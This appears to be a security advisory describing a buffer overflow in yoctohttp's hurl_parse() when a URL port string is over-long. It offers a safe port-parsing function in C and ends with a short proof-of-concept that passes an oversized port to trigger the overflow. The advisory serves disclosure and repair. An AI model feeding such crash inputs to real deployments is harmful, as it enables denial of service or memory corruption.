CSECA-07001 - Buffer overflow in hurl_parse()

The TCP port number is copied into a fixed-size buffer before it is converted into an integer. Supplying a port string longer than the buffer size - 1 will cause the buffer to overflow.
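
One way to avoid the copy entirely is to validate and convert the port in place. The following is an added example, not yoctohttp's code; parse_port() and port_or_error() are hypothetical names, and the input is assumed to be the NUL-terminated text that follows "host:" in the URL.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical helper (not yoctohttp's API): parse the port that follows
 * "host:" in a URL. `s` points at the first character after the colon;
 * the field ends at '/', '?', '#' or end of string.
 * Returns 0 and stores the port on success, -1 on malformed input. */
int parse_port(const char *s, unsigned *port_out)
{
    /* Measure the field where it lies: nothing is copied, so there is
     * no destination buffer to overflow. */
    size_t len = strcspn(s, "/?#");
    unsigned long value = 0;

    /* 65535 has five digits. Rejecting empty and over-long fields here
     * is the length check the vulnerable copy lacked. */
    if (len == 0 || len > 5)
        return -1;

    for (size_t i = 0; i < len; i++) {
        if (s[i] < '0' || s[i] > '9')
            return -1;          /* signs, spaces, hex digits, etc. */
        value = value * 10 + (unsigned long)(s[i] - '0');
    }
    if (value == 0 || value > 65535)
        return -1;              /* outside the valid TCP port range */

    *port_out = (unsigned)value;
    return 0;
}

/* Convenience wrapper: returns the port, or -1 if it was rejected. */
long port_or_error(const char *s)
{
    unsigned port;
    return parse_port(s, &port) == 0 ? (long)port : -1L;
}

int main(void)
{
    /* Constructed sample inputs. */
    const char *samples[] = { "8080/index.html", "65536/", "123456/", "80a/" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++)
        printf("%-16s -> %ld\n", samples[i], port_or_error(samples[i]));
    return 0;
}
```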

Example Code

  #include <yoctohttp/common.h>

  #include <stdio.h>
  #include <string.h>

  int main(int argc, char **argv) {
    hurl_t hurl;
    char *url;

    url = strdup("http://localhost:12345678900123456789123456789001234567891234567890012345678912345678900123456789/");
    hurl_parse(&hurl, url);

    return 0;
  }